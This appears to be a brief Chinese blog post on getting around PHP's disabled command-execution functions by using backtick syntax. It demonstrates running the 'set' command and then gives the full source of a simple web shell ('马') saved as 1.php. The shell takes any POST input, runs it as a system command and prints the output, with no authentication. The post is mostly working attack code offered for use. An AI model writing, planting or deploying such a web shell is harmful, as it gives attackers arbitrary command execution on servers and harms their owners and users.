绕过PHP执行命令的函数执行系统cmd命令

<?php
$evil=`set`;
echo '<pre>'.$evil.'</pre>';
?> 

  

 

成功执行set命令,你懂的!

顺手写了个php执行cmd命令的马,保存为1.php

<!DOCTYPE html>
<html>
<head>
	<title></title>
</head>
<body>
<form action="1.php" method="post">
	<input type="text" name="html" placeholder="">
	<input type="submit" name="submit" value="fuck">
</form>
</body>
</html>
<?php
$str=$_POST['html'];
$html=`$str`;
echo $html;
?>

  

 

 

posted @ 2021-08-11 00:23  华中第一黑  阅读(182)  评论(0编辑  收藏  举报